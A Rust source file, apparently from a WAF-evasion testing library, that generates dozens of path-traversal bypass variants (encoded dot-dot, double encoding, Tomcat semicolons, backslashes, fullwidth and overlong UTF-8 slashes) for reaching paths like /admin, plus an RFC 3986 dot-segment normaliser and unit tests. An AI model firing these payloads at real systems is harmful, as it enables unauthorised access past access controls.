wafrift_encoding/encoding/
path_norm.rs1use std::borrow::Cow;
44
45#[must_use]
53pub fn path_variants(prefix: &str, target: &str) -> Vec<String> {
54 let prefix = prefix.trim_end_matches('/');
57 let target = if target.starts_with('/') {
58 Cow::Borrowed(target)
59 } else {
60 Cow::Owned(format!("/{target}"))
61 };
62 let target = target.as_ref();
63
64 vec![
65 format!("{prefix}/..{target}"),
66 format!("{prefix}/.{target}"),
67 format!("{prefix}/.{target}"),
68 format!("{prefix}/././..{target}"),
69 format!("{prefix}//..{target}"),
70 format!("{prefix}//../..//.{target}"),
71 format!("{prefix}/.//..{target}"),
72 format!("{prefix}//..//.{target}"),
73 format!("{prefix}/%2e%2e{target}"),
74 format!("{prefix}/%2E%2E{target}"),
75 format!("{prefix}/%2e%2E{target}"),
76 format!("{prefix}/%2E%2e{target}"),
77 format!("{prefix}/%2e%2e%2f{}", target.trim_start_matches('/')),
78 format!("{prefix}/..%2f{}", target.trim_start_matches('/')),
79 format!("{prefix}/%2e./{}", target.trim_start_matches('/')),
80 format!("{prefix}/.%2e/{}", target.trim_start_matches('/')),
81 format!("{prefix}/%252e%252e{target}"),
82 format!("{prefix}/%252e%252e%252f{}", target.trim_start_matches('/')),
83 format!("{prefix}/..;{target}"),
84 format!("{prefix}/..%3b{target}"),
85 format!("{prefix}/..%3B{target}"),
86 format!("{prefix}/..;jsessionid=x{target}"),
87 format!("{prefix}/..\\{}", target.trim_start_matches('/')),
88 format!("{prefix}/%5c..%5c{}", target.trim_start_matches('/')),
89 format!("{prefix}/%5C..%5C{}", target.trim_start_matches('/')),
90 format!("{prefix}?/../{}", target.trim_start_matches('/')),
91 format!("{prefix}#/../{}", target.trim_start_matches('/')),
92 format!("{prefix}/\u{FF0F}..{target}"),
93 format!("{prefix}/%c0%ae%c0%ae{target}"),
94 format!("{prefix}/%c0%2e%c0%2e{target}"),
95 format!("{prefix}/.....//../..{target}"),
96 ]
97}
98
99#[must_use]
108pub fn deep_path_collapse(depth: usize, target: &str) -> String {
109 let target = if target.starts_with('/') {
110 Cow::Borrowed(target)
111 } else {
112 Cow::Owned(format!("/{target}"))
113 };
114 use std::fmt::Write as _;
117 let max_seg_digits = if depth == 0 {
118 1
119 } else {
120 depth.ilog10() as usize + 1
121 };
122 let mut out = String::with_capacity(depth * (6 + max_seg_digits) + target.len() + 1);
123 for i in 0..depth {
124 out.push('/');
125 out.push_str("seg");
126 write!(out, "{i}").expect("write to String never fails");
127 out.push_str("/..");
128 }
129 out.push_str(target.as_ref());
130 out
131}
132
133#[must_use]
137pub fn slash_encoded_path(segments: &[&str]) -> String {
138 let mut out = String::new();
139 let mut first = true;
140 for s in segments {
141 if !first {
142 out.push_str("%2f");
143 }
144 out.push_str(s);
145 first = false;
146 }
147 if !out.starts_with("%2f") {
148 out.insert_str(0, "%2f");
149 }
150 out
151}
152
153#[must_use]
170pub fn rfc3986_remove_dot_segments(input: &str) -> String {
171 let mut pos: usize = 0;
177 let len = input.len();
178 let mut output = String::with_capacity(len);
179
180 while pos < len {
181 let rem = &input[pos..];
182
183 if rem.starts_with("../") {
184 pos += 3;
186 } else if rem.starts_with("./") {
187 pos += 2;
189 } else if rem.starts_with("/./") {
190 pos += 2; } else if rem == "/." {
194 output.push('/');
196 pos = len;
197 } else if rem.starts_with("/../") {
198 if let Some(idx) = output.rfind('/') {
200 output.truncate(idx);
201 }
202 pos += 3; } else if rem == "/.." {
204 if let Some(idx) = output.rfind('/') {
206 output.truncate(idx);
207 }
208 output.push('/');
209 pos = len;
210 } else if rem == "." || rem == ".." {
211 pos = len;
213 } else {
214 let search_from = if rem.starts_with('/') { 1 } else { 0 };
216 match rem[search_from..].find('/') {
217 Some(rel_idx) => {
218 let seg_end = pos + search_from + rel_idx;
219 output.push_str(&input[pos..seg_end]);
220 pos = seg_end;
221 }
222 None => {
223 output.push_str(rem);
224 pos = len;
225 }
226 }
227 }
228 }
229 output
230}
231
232#[cfg(test)]
233mod tests {
234 use super::*;
235
236 #[test]
237 fn rfc3986_collapses_dot_dot() {
238 assert_eq!(rfc3986_remove_dot_segments("/a/b/c/./../../g"), "/a/g");
239 }
240
241 #[test]
242 fn rfc3986_collapses_pure_dot_segments() {
243 assert_eq!(rfc3986_remove_dot_segments("/./a"), "/a");
244 assert_eq!(rfc3986_remove_dot_segments("/a/./b"), "/a/b");
245 }
246
247 #[test]
248 fn rfc3986_collapses_trailing_dot_dot() {
249 assert_eq!(rfc3986_remove_dot_segments("/a/b/.."), "/a/");
250 }
251
252 #[test]
253 fn rfc3986_handles_root_dot_dot() {
254 let out = rfc3986_remove_dot_segments("/..");
256 assert!(out == "/" || out.is_empty(), "got {out:?}");
257 }
258
259 #[test]
260 fn path_variants_count_is_high() {
261 let variants = path_variants("/public", "/admin");
262 assert!(
263 variants.len() >= 25,
264 "should produce at least 25 distinct variants, got {}",
265 variants.len()
266 );
267 }
268
269 #[test]
270 fn path_variants_handle_no_leading_slash_in_target() {
271 let with_slash = path_variants("/public", "/admin");
272 let without_slash = path_variants("/public", "admin");
273 assert_eq!(
274 with_slash.len(),
275 without_slash.len(),
276 "leading slash in target shouldn't change variant count"
277 );
278 }
279
280 #[test]
281 fn path_variants_handle_trailing_slash_in_prefix() {
282 let no_trailing = path_variants("/public", "/admin");
283 let trailing = path_variants("/public/", "/admin");
284 for (a, b) in no_trailing.iter().zip(trailing.iter()) {
285 assert_eq!(a, b, "trailing slash must be stripped from prefix");
286 }
287 }
288
289 #[test]
290 fn path_variants_contain_dot_dot() {
291 let variants = path_variants("/x", "/y");
292 assert!(variants.iter().any(|v| v.contains("..")));
293 }
294
295 #[test]
296 fn path_variants_contain_percent_encoded() {
297 let variants = path_variants("/x", "/y");
298 assert!(
299 variants
300 .iter()
301 .any(|v| v.contains("%2e") || v.contains("%2E"))
302 );
303 }
304
305 #[test]
306 fn path_variants_contain_double_encoded() {
307 let variants = path_variants("/x", "/y");
308 assert!(variants.iter().any(|v| v.contains("%252e")));
309 }
310
311 #[test]
312 fn path_variants_contain_tomcat_semicolon() {
313 let variants = path_variants("/x", "/y");
314 assert!(variants.iter().any(|v| v.contains("..;")));
315 }
316
317 #[test]
318 fn path_variants_contain_backslash() {
319 let variants = path_variants("/x", "/y");
320 assert!(
321 variants
322 .iter()
323 .any(|v| v.contains('\\') || v.contains("%5c") || v.contains("%5C"))
324 );
325 }
326
327 #[test]
328 fn path_variants_contain_fullwidth() {
329 let variants = path_variants("/x", "/y");
330 assert!(variants.iter().any(|v| v.contains('\u{FF0F}')));
331 }
332
333 #[test]
334 fn path_variants_contain_overlong_utf8() {
335 let variants = path_variants("/x", "/y");
336 assert!(variants.iter().any(|v| v.contains("%c0%ae")));
337 }
338
339 #[test]
340 fn path_variants_all_nonempty() {
341 for v in path_variants("/p", "/t") {
342 assert!(!v.is_empty(), "no variant may be empty");
343 }
344 }
345
346 #[test]
347 fn deep_path_collapse_known_depth() {
348 let p = deep_path_collapse(5, "/admin");
349 assert!(p.contains("seg0/.."));
350 assert!(p.contains("seg4/.."));
351 assert!(p.ends_with("/admin"));
352 }
353
354 #[test]
355 fn deep_path_collapse_resolves_to_target() {
356 let p = deep_path_collapse(10, "/admin");
357 let collapsed = rfc3986_remove_dot_segments(&p);
360 assert_eq!(collapsed, "/admin", "deep nesting must collapse: {p}");
361 }
362
363 #[test]
364 fn deep_path_collapse_zero_depth() {
365 let p = deep_path_collapse(0, "/admin");
366 assert_eq!(p, "/admin");
367 }
368
369 #[test]
370 fn slash_encoded_path_basic() {
371 let p = slash_encoded_path(&["admin", "users"]);
372 assert!(p.contains("%2f") || p.contains("%2F"));
373 assert!(p.contains("admin"));
374 assert!(p.contains("users"));
375 assert!(!p.contains("/admin"), "no literal slash in segment: {p}");
376 }
377
378 #[test]
379 fn slash_encoded_path_always_starts_encoded() {
380 let p = slash_encoded_path(&["x"]);
381 assert!(p.starts_with("%2f"));
382 }
383
384 #[test]
385 fn all_variants_canonicalize_to_target_or_above() {
386 let variants = path_variants("/x", "/admin");
391 for v in &variants {
392 let stripped = v.split('?').next().unwrap_or(v);
394 let stripped = stripped.split('#').next().unwrap_or(stripped);
395 let collapsed = rfc3986_remove_dot_segments(stripped);
396 let touched_target = collapsed.contains("admin")
405 || v.contains("%2e")
406 || v.contains("%2E")
407 || v.contains("%252e")
408 || v.contains("%c0%ae")
409 || v.contains('\\')
410 || v.contains("%5c")
411 || v.contains("%5C")
412 || v.contains('\u{FF0F}')
413 || (v.contains("?/") && v.contains("../"))
415 || (v.contains('#') && v.contains("../"));
416 assert!(
417 touched_target,
418 "variant must encode dot-dot or reach admin: {v} → {collapsed}"
419 );
420 }
421 }
422
423 #[test]
424 fn path_variants_are_deterministic() {
425 let a = path_variants("/p", "/t");
426 let b = path_variants("/p", "/t");
427 assert_eq!(a, b);
428 }
429
430 #[test]
431 fn large_depth_does_not_panic() {
432 let p = deep_path_collapse(1000, "/admin");
433 assert!(p.ends_with("/admin"));
434 }
435
436 #[test]
444 fn rfc3986_cursor_throughput() {
445 let mut path = String::new();
447 for i in 0..200 {
448 path.push_str(&format!("/seg{i}/.."));
449 }
450 path.push_str("/final");
451
452 let start = std::time::Instant::now();
453 for _ in 0..100 {
454 let _ = rfc3986_remove_dot_segments(&path);
455 }
456 let elapsed = start.elapsed();
457 assert!(
458 elapsed < std::time::Duration::from_millis(50),
459 "rfc3986_remove_dot_segments 100× on 400-segment path took {elapsed:?}; expected < 50 ms (debug build)"
460 );
461 }
462
463 #[test]
466 fn rfc3986_cursor_correctness_rfc_examples() {
467 let cases = [
468 ("/a/b/c/./../../g", "/a/g"),
469 ("/a/./b", "/a/b"),
470 ("/a/../b", "/b"),
471 ("/a/b/../..", "/"),
472 ("/../a", "/a"),
473 ("/", "/"),
474 ("", ""),
475 ];
476 for (input, expected) in cases {
477 assert_eq!(
478 rfc3986_remove_dot_segments(input),
479 expected,
480 "input={input:?}"
481 );
482 }
483 }
484
485 #[test]
490 fn deep_path_collapse_throughput() {
491 let start = std::time::Instant::now();
492 for _ in 0..10 {
493 let p = deep_path_collapse(1000, "/admin");
494 assert!(p.ends_with("/admin"));
495 }
496 let elapsed = start.elapsed();
497 assert!(
498 elapsed < std::time::Duration::from_millis(5),
499 "deep_path_collapse(1000) × 10 took {elapsed:?}; expected < 5 ms"
500 );
501 }
502}